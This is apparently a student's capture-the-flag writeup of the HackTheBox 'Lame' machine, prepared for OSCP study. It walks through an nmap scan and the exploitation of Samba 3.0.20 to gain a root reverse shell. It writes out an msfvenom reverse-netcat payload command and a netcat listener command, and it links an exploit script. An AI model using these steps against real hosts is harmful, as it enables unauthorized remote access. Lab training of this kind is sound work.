Lame HTB Writeup
Hi everyone, this is my writeup for box “Lame” found on HackTheBox .
I am a student looking forward to my OSCP Exam preparation. So, I decided to solve the famous TJNull’s list of boxes. Here is the first writeup from it.
Overview : Anonymous FTP Login, SMB 3.0.20 Exploit to get Reverse Shell
IP address of the Machine : 10.10.10.3
Phase 1 : Recon
1. Starting off with an Nmap Scan to get information about the open ports.
nmap -sC -sV -Pn 10.10.10.3
We get the following results from the nmap scan.
We have 4 Ports open :
Port 21:Running FTP vsftpd 2.3.4
Port 22 : Running OpenSSH 4.7 p1
Port 139 and Port 445 : Running Samba 3.0.20
Part 2 : Enumeration
As we can use Anonymous login to login into FTP. ( From Nmap Scan ) So, let’s try connecting via FTP.
But there were no files we could access using FTP.
Moving On, Let’s Google about “Samba 3.0.20 Exploit” and BINGO!! there are several exploits.
But But…. Be aware of using Metasploit modules as we can’t use them in OSCP.
So I found an exploit that we could use.
https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py
We could use it But we have to add our payload for Reverse Shell.
We can use msfvenom to generate the Reverse Shell payload.
msfvenom -p cmd/unix/reverse_netcat LHOST=<YOUR IP> LPORT=<PORT NO> -f python
Start a Netcat listener in other tab in order to get the reverse shell.
nc -nvlp <PORT NO>
Now run the exploit after replacing the Reverse Shell Payload. I encountered some problems while running the exploit….
Error1 :
Error 2 :
So, I googled about them and found solutions to those If you face the same error you can refer to the links mentioned below:
https://stackoverflow.com/questions/606191/convert-bytes-to-a-string
After making the above changes the final exploit will look liked this :
Part 3 : Getting Flags
Fire the exploit and this time You will get a reverse Shell In the Netcat listener you started in the another tab.
We get the Reverse Shell as “Root”.
Getting the user and root flags are now a piece of cake.
And the machine is pwned.
Things I learned from this Box :
→ Having some knowledge of python is a must in order to understand and make the exploit work.
So this was my first of the many more upcoming writeup’s from the list. So, Keep in tune and Thanks for reading the Writeup. I hope you liked it.
Any type of feedback or suggestions are appreciated.
You can reach out to me on :
Twitter : https://twitter.com/Viren2737
LinkedIn : https://www.linkedin.com/in/viren-saroha-3391371a3/